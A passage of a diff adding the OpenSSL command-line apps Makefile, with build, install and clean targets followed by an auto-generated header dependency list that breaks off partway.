+INCLUDES=	-I$(TOP) -I../include $(KRB5_INCLUDES)
+CFLAG=		-g -static
+MAKEFILE=	Makefile
+PERL=		perl
+RM=		rm -f
+# KRB5 stuff
+KRB5_INCLUDES=
+LIBKRB5=
+
+PEX_LIBS=
+EX_LIBS= 
+EXE_EXT= 
+
+SHLIB_TARGET=
+
+CFLAGS= -DMONOLITH $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile makeapps.com install.com
+
+DLIBCRYPTO=../libcrypto.a
+DLIBSSL=../libssl.a
+LIBCRYPTO=-L.. -lcrypto
+LIBSSL=-L.. -lssl
+
+PROGRAM= openssl
+
+SCRIPTS=CA.sh CA.pl tsget
+
+EXE= $(PROGRAM)$(EXE_EXT)
+
+E_EXE=	verify asn1pars req dgst dh dhparam enc passwd gendh errstr \
+	ca crl rsa rsautl dsa dsaparam ec ecparam \
+	x509 genrsa gendsa genpkey s_server s_client speed \
+	s_time version pkcs7 cms crl2pkcs7 sess_id ciphers nseq pkcs12 \
+	pkcs8 pkey pkeyparam pkeyutl spkac smime rand engine ocsp prime ts srp
+
+PROGS= $(PROGRAM).c
+
+A_OBJ=apps.o
+A_SRC=apps.c
+S_OBJ=	s_cb.o s_socket.o
+S_SRC=	s_cb.c s_socket.c
+RAND_OBJ=app_rand.o
+RAND_SRC=app_rand.c
+
+E_OBJ=	verify.o asn1pars.o req.o dgst.o dh.o dhparam.o enc.o passwd.o gendh.o errstr.o \
+	ca.o pkcs7.o crl2p7.o crl.o \
+	rsa.o rsautl.o dsa.o dsaparam.o ec.o ecparam.o \
+	x509.o genrsa.o gendsa.o genpkey.o s_server.o s_client.o speed.o \
+	s_time.o $(A_OBJ) $(S_OBJ) $(RAND_OBJ) version.o sess_id.o \
+	ciphers.o nseq.o pkcs12.o pkcs8.o pkey.o pkeyparam.o pkeyutl.o \
+	spkac.o smime.o cms.o rand.o engine.o ocsp.o prime.o ts.o srp.o
+
+E_SRC=	verify.c asn1pars.c req.c dgst.c dh.c enc.c passwd.c gendh.c errstr.c ca.c \
+	pkcs7.c crl2p7.c crl.c \
+	rsa.c rsautl.c dsa.c dsaparam.c ec.c ecparam.c \
+	x509.c genrsa.c gendsa.c genpkey.c s_server.c s_client.c speed.c \
+	s_time.c $(A_SRC) $(S_SRC) $(RAND_SRC) version.c sess_id.c \
+	ciphers.c nseq.c pkcs12.c pkcs8.c pkey.c pkeyparam.c pkeyutl.c \
+	spkac.c smime.c cms.c rand.c engine.c ocsp.c prime.c ts.c srp.c
+
+SRC=$(E_SRC)
+
+EXHEADER=
+HEADER=	apps.h progs.h s_apps.h \
+	testdsa.h testrsa.h \
+	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	@(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all:	exe
+
+exe:	$(EXE)
+
+req: sreq.o $(A_OBJ) $(DLIBCRYPTO)
+	shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	fi; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		APPNAME=req OBJECTS="sreq.o $(A_OBJ) $(RAND_OBJ)" \
+		LIBDEPS="$(PEX_LIBS) $(LIBCRYPTO) $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+sreq.o: req.c 
+	$(CC) -c $(INCLUDES) $(CFLAG) -o sreq.o req.c
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@set -e; for i in $(EXE); \
+	do  \
+	(echo installing $$i; \
+	 cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 chmod 755 $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i ); \
+	 done;
+	@set -e; for i in $(SCRIPTS); \
+	do  \
+	(echo installing $$i; \
+	 cp $$i $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new; \
+	 chmod 755 $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new; \
+	 mv -f $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i ); \
+	 done
+	@cp openssl.cnf $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf.new; \
+	chmod 644 $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf.new; \
+	mv -f  $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf.new $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+links:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(SRC); \
+	fi
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f CA.pl
+
+clean:
+	rm -f *.o *.obj *.dll lib tags core .pure .nfs* *.old *.bak fluff $(EXE)
+	rm -f req
+
+$(DLIBSSL):
+	(cd ..; $(MAKE) DIRS=ssl all)
+
+$(DLIBCRYPTO):
+	(cd ..; $(MAKE) DIRS=crypto all)
+
+$(EXE): progs.h $(E_OBJ) $(PROGRAM).o $(DLIBCRYPTO) $(DLIBSSL)
+	$(RM) $(EXE)
+	shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	elif [ -n "$(FIPSCANLIB)" ]; then \
+	  FIPSLD_CC="$(CC)"; CC=$(FIPSDIR)/bin/fipsld; export CC FIPSLD_CC; \
+	fi; \
+	LIBRARIES="$(LIBSSL) $(LIBKRB5) $(LIBCRYPTO)" ; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		APPNAME=$(EXE) OBJECTS="$(PROGRAM).o $(E_OBJ)" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+	@(cd ..; $(MAKE) rehash)
+
+progs.h: progs.pl
+	$(PERL) progs.pl $(E_EXE) >progs.h
+	$(RM) $(PROGRAM).o
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+app_rand.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+app_rand.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+app_rand.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+app_rand.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+app_rand.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+app_rand.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+app_rand.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+app_rand.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+app_rand.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+app_rand.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+app_rand.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+app_rand.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h
+app_rand.o: app_rand.c apps.h
+apps.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+apps.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+apps.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+apps.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+apps.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+apps.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+apps.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+apps.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+apps.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+apps.o: ../include/openssl/pkcs12.h ../include/openssl/pkcs7.h
+apps.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+apps.o: ../include/openssl/sha.h ../include/openssl/stack.h
+apps.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+apps.o: ../include/openssl/ui.h ../include/openssl/x509.h
+apps.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.c apps.h
+asn1pars.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+asn1pars.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+asn1pars.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+asn1pars.o: ../include/openssl/err.h ../include/openssl/evp.h
+asn1pars.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+asn1pars.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+asn1pars.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+asn1pars.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+asn1pars.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+asn1pars.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+asn1pars.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+asn1pars.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+asn1pars.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+asn1pars.o: asn1pars.c
+ca.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ca.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ca.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ca.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ca.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+ca.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ca.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ca.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ca.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ca.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+ca.o: ../include/openssl/sha.h ../include/openssl/stack.h
+ca.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+ca.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ca.o: ../include/openssl/x509v3.h apps.h ca.c
+ciphers.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ciphers.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+ciphers.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+ciphers.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ciphers.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ciphers.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ciphers.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ciphers.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ciphers.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ciphers.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ciphers.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ciphers.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ciphers.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ciphers.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ciphers.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ciphers.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ciphers.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+ciphers.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+ciphers.o: ciphers.c
+cms.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+cms.o: ../include/openssl/buffer.h ../include/openssl/cms.h
+cms.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+cms.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+cms.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+cms.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+cms.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+cms.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+cms.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+cms.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+cms.o: ../include/openssl/sha.h ../include/openssl/stack.h
+cms.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+cms.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+cms.o: ../include/openssl/x509v3.h apps.h cms.c
+crl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+crl.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+crl.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+crl.o: ../include/openssl/err.h ../include/openssl/evp.h
+crl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+crl.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+crl.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+crl.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+crl.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+crl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+crl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+crl.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+crl.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h crl.c
+crl2p7.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+crl2p7.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+crl2p7.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+crl2p7.o: ../include/openssl/err.h ../include/openssl/evp.h
+crl2p7.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+crl2p7.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+crl2p7.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+crl2p7.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+crl2p7.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+crl2p7.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+crl2p7.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+crl2p7.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+crl2p7.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+crl2p7.o: crl2p7.c
+dgst.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dgst.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+dgst.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+dgst.o: ../include/openssl/err.h ../include/openssl/evp.h
+dgst.o: ../include/openssl/hmac.h ../include/openssl/lhash.h
+dgst.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+dgst.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+dgst.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dgst.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+dgst.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+dgst.o: ../include/openssl/sha.h ../include/openssl/stack.h
+dgst.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+dgst.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+dgst.o: ../include/openssl/x509v3.h apps.h dgst.c
+dh.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dh.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+dh.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+dh.o: ../include/openssl/dh.h ../include/openssl/e_os2.h
+dh.o: ../include/openssl/err.h ../include/openssl/evp.h
+dh.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+dh.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+dh.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+dh.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+dh.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+dh.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+dh.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+dh.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+dh.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h dh.c
+dsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+dsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+dsa.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+dsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+dsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+dsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+dsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+dsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+dsa.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+dsa.o: ../include/openssl/sha.h ../include/openssl/stack.h
+dsa.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+dsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+dsa.o: ../include/openssl/x509v3.h apps.h dsa.c
+dsaparam.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dsaparam.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+dsaparam.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+dsaparam.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+dsaparam.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+dsaparam.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+dsaparam.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+dsaparam.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+dsaparam.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dsaparam.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+dsaparam.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+dsaparam.o: ../include/openssl/sha.h ../include/openssl/stack.h
+dsaparam.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+dsaparam.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+dsaparam.o: ../include/openssl/x509v3.h apps.h dsaparam.c
+ec.o: ../include/openssl/opensslconf.h ec.c
+ecparam.o: ../include/openssl/opensslconf.h ecparam.c
+enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+enc.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+enc.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+enc.o: ../include/openssl/err.h ../include/openssl/evp.h
+enc.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+enc.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+enc.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+enc.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+enc.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+enc.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+enc.o: ../include/openssl/sha.h ../include/openssl/stack.h
+enc.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+enc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+enc.o: ../include/openssl/x509v3.h apps.h enc.c
+engine.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+engine.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+engine.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+engine.o: ../include/openssl/err.h ../include/openssl/evp.h
+engine.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+engine.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+engine.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+engine.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+engine.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+engine.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+engine.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+engine.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+engine.o: engine.c
+errstr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+errstr.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+errstr.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+errstr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+errstr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+errstr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+errstr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+errstr.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+errstr.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+errstr.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+errstr.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+errstr.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+errstr.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+errstr.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+errstr.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+errstr.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+errstr.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+errstr.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+errstr.o: errstr.c
+gendh.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+gendh.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+gendh.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+gendh.o: ../include/openssl/dh.h ../include/openssl/e_os2.h
+gendh.o: ../include/openssl/err.h ../include/openssl/evp.h
+gendh.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+gendh.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+gendh.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+gendh.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+gendh.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+gendh.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+gendh.o: ../include/openssl/sha.h ../include/openssl/stack.h
+gendh.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+gendh.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+gendh.o: ../include/openssl/x509v3.h apps.h gendh.c
+gendsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+gendsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+gendsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+gendsa.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+gendsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+gendsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+gendsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+gendsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+gendsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+gendsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+gendsa.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+gendsa.o: ../include/openssl/sha.h ../include/openssl/stack.h
+gendsa.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+gendsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+gendsa.o: ../include/openssl/x509v3.h apps.h gendsa.c
+genpkey.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+genpkey.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+genpkey.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+genpkey.o: ../include/openssl/err.h ../include/openssl/evp.h
+genpkey.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+genpkey.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+genpkey.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+genpkey.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+genpkey.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+genpkey.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+genpkey.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+genpkey.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+genpkey.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+genpkey.o: genpkey.c
+genrsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+genrsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+genrsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+genrsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+genrsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+genrsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+genrsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+genrsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+genrsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+genrsa.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+genrsa.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+genrsa.o: ../include/openssl/sha.h ../include/openssl/stack.h
+genrsa.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+genrsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+genrsa.o: ../include/openssl/x509v3.h apps.h genrsa.c
+nseq.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+nseq.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+nseq.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+nseq.o: ../include/openssl/err.h ../include/openssl/evp.h
+nseq.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+nseq.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+nseq.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+nseq.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+nseq.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+nseq.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+nseq.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+nseq.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+nseq.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h nseq.c
+ocsp.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ocsp.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ocsp.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ocsp.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ocsp.o: ../include/openssl/err.h ../include/openssl/evp.h
+ocsp.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ocsp.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ocsp.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+ocsp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ocsp.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ocsp.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ocsp.o: ../include/openssl/pqueue.h ../include/openssl/safestack.h
+ocsp.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+ocsp.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+ocsp.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+ocsp.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+ocsp.o: ../include/openssl/tls1.h ../include/openssl/txt_db.h
+ocsp.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ocsp.o: ../include/openssl/x509v3.h apps.h ocsp.c
+openssl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+openssl.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+openssl.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+openssl.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+openssl.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+openssl.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+openssl.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+openssl.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+openssl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+openssl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+openssl.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+openssl.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+openssl.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+openssl.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+openssl.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+openssl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+openssl.o: ../include/openssl/tls1.h ../include/openssl/txt_db.h
+openssl.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+openssl.o: ../include/openssl/x509v3.h apps.h openssl.c progs.h s_apps.h
+passwd.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
